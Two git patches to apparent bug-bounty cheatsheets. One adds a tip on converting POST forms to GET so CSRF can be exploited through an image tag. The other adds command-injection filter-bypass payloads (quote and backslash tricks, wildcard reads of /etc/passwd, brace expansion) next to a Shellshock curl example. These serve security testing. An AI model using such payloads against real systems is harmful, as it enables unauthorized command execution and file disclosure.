From 62b8a6623bc4984cd850d4703c65717456252694 Mon Sep 17 00:00:00 2001 From: Kuromatae Date: Mon, 28 Oct 2019 14:30:57 +0100 Subject: [PATCH 1/2] Update bugbountytips.md Added tip #7 --- cheatsheets/bugbountytips.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cheatsheets/bugbountytips.md b/cheatsheets/bugbountytips.md index ae268db..d678d96 100644 --- a/cheatsheets/bugbountytips.md +++ b/cheatsheets/bugbountytips.md @@ -29,3 +29,10 @@ Look for *hackathon-related* assets. What I mean by this is sometimes companies **Tip #6** Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/ + + + +**Tip #7** + +When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. +For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim. From 71007f84c8ec00a3115146deadc093ca35bfb1fb Mon Sep 17 00:00:00 2001 From: Kuromatae Date: Mon, 28 Oct 2019 14:54:49 +0100 Subject: [PATCH 2/2] Update rce.md Added some bypasses --- cheatsheets/rce.md | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 66d39cf..7ddfc73 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -10,6 +10,27 @@ strŅ–ng If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. +**Basic Bypasses** + +``` +i'''d +i"""d +``` + +``` +\l\s -l\a\h +``` + +``` +cat /e?c/p?ss?? +cat /e??/??ss* +``` + +``` +{ls,} +{ls,-a} +``` + **Shellshock Bug** ```bash @@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru ```zsh curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ -``` \ No newline at end of file +```